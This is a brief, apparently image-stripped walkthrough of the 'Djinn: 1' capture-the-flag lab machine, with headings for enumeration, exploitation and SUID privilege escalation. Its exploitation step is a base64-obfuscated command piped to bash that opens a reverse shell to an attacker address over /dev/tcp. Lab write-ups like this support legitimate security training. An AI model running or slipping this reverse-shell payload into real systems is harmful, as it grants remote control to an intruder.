DJINN: 1 — Walkthrough
Level: Beginner-Intermediate
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
- Format: Virtual Machine (Virtualbox — OVA)
- Operating System: Linux
Enumeration
More Enumeration,
Exploitation
Let’s execute the command to bypass the injection,
echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash
Privilege Escalation
we have a suid file named genie
- looked through the strings output of genie
- we can see that we have another parameter -cmd
same goes for /lago